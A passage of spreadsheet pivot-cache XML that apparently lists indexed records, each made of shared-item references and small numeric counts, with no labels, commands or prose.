    <n v="0"/>
    <x v="963"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="963"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="0"/>
    <x v="963"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="963"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="1"/>
    <x v="963"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="963"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="3"/>
    <x v="963"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="8"/>
    <x v="963"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="26"/>
    <x v="963"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="963"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="964"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="964"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="964"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="964"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="964"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="964"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="4"/>
    <x v="964"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="964"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="964"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="5"/>
    <x v="964"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="30"/>
    <x v="964"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="10"/>
    <x v="964"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="24"/>
    <x v="964"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="2"/>
    <x v="964"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="965"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="965"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="60"/>
    <x v="965"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="440"/>
    <x v="965"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="965"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="10"/>
    <x v="965"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="3"/>
    <x v="965"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="4"/>
    <x v="965"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="965"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="15"/>
    <x v="965"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="57"/>
    <x v="965"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="406"/>
    <x v="965"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="30"/>
    <x v="965"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="965"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="966"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="966"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="966"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="966"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="2"/>
    <x v="966"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="0"/>
    <x v="966"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="4"/>
    <x v="966"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="966"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="8"/>
    <x v="966"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="8"/>
    <x v="966"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="966"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="966"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="0"/>
    <x v="966"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="966"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="967"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="967"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="967"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="967"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="4"/>
    <x v="967"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="2"/>
    <x v="967"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="0"/>
    <x v="967"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="967"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="967"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="967"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="967"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="967"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="6"/>
    <x v="967"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="2"/>
    <x v="967"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="968"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="968"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="968"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="968"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="3"/>
    <x v="968"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="968"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="0"/>
    <x v="968"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="968"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="1"/>
    <x v="968"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="968"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="968"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="968"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="0"/>
    <x v="968"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="968"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="969"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="969"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="969"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="969"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="7"/>
    <x v="969"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="5"/>
    <x v="969"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="5"/>
    <x v="969"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="3"/>
    <x v="969"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="969"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="969"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="30"/>
    <x v="969"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="20"/>
    <x v="969"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="26"/>
    <x v="969"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="969"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="970"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="970"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="970"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="970"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="970"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="970"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="0"/>
    <x v="970"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="6"/>
    <x v="970"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="1"/>
    <x v="970"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="970"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="3"/>
    <x v="970"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="970"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="14"/>
    <x v="970"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="2"/>
    <x v="970"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="971"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="971"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="971"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="971"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="2"/>
    <x v="971"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="0"/>
    <x v="971"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="6"/>
    <x v="971"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="971"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="971"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="971"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="971"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="971"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="24"/>
    <x v="971"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="2"/>
    <x v="971"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="972"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="972"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="972"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="972"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="972"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="0"/>
    <x v="972"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="0"/>
    <x v="972"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="972"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="972"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="972"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="972"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="972"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="0"/>
    <x v="972"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="972"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="1"/>
    <x v="972"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="9"/>
    <x v="972"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="6"/>
    <x v="74"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="973"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="973"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="973"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="973"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="973"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="2"/>
    <x v="973"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="3"/>
    <x v="973"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="5"/>
    <x v="973"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="3"/>
    <x v="973"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="5"/>
    <x v="973"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="5"/>
    <x v="973"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="9"/>
    <x v="973"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="6"/>
    <x v="973"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="973"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="1"/>
    <x v="972"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="974"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="974"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="974"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="974"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="6"/>
    <x v="974"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="2"/>
    <x v="974"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="0"/>
    <x v="974"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="974"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="974"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="974"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="974"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="974"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="0"/>
    <x v="974"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="974"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="1"/>
    <x v="975"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="975"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="13"/>
    <x v="975"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="1"/>
    <x v="975"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="20"/>
    <x v="975"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="0"/>
    <x v="975"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="13"/>
    <x v="975"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="1"/>
    <x v="975"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="975"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="975"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="975"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="975"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="24"/>
    <x v="975"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="975"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="976"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="976"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="976"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="976"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="4"/>
    <x v="976"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="0"/>
    <x v="976"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="10"/>
    <x v="976"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="976"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="976"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="976"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="976"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="976"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="25"/>
    <x v="976"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="976"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="977"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="977"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="977"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="977"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="3"/>
    <x v="977"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="3"/>
    <x v="977"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="0"/>
    <x v="977"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="977"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="977"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="977"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="977"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="977"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="25"/>
    <x v="977"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="977"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="978"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="978"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="978"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="978"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="978"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="978"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="0"/>
    <x v="978"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="978"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="1"/>
    <x v="978"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="978"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="978"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="978"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="20"/>
    <x v="978"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="978"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="2"/>
    <x v="312"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="2"/>
    <x v="312"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="3"/>
    <x v="312"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="1"/>
    <x v="312"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="10"/>
    <x v="312"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="20"/>
    <x v="312"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="8"/>
    <x v="645"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="645"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="979"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="7"/>
    <x v="979"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="56"/>
    <x v="979"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="12"/>
    <x v="979"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="979"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="7"/>
    <x v="979"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="56"/>
    <x v="979"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="12"/>
    <x v="979"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="979"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="979"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="979"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="979"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="20"/>
    <x v="979"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="979"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="980"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="980"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="980"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="980"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="2"/>
    <x v="980"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="0"/>
    <x v="980"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="18"/>
    <x v="980"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="2"/>
    <x v="980"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="980"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="980"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="980"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="980"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="26"/>
    <x v="980"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="2"/>
    <x v="980"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="2"/>
    <x v="981"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="2"/>
    <x v="981"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="9"/>
    <x v="981"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="9"/>
    <x v="981"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="2"/>
    <x v="981"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="2"/>
    <x v="981"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="9"/>
    <x v="981"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="9"/>
    <x v="981"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="981"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="981"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="981"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="981"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="26"/>
    <x v="981"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="2"/>
    <x v="981"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="982"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="982"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="982"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="982"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="982"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="982"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="6"/>
    <x v="982"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="982"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="982"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="982"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="982"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="982"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="26"/>
    <x v="982"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="982"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="983"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="983"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="983"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="983"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="983"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="983"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="0"/>
    <x v="983"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="3"/>
    <x v="983"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="983"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="983"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="983"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="983"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
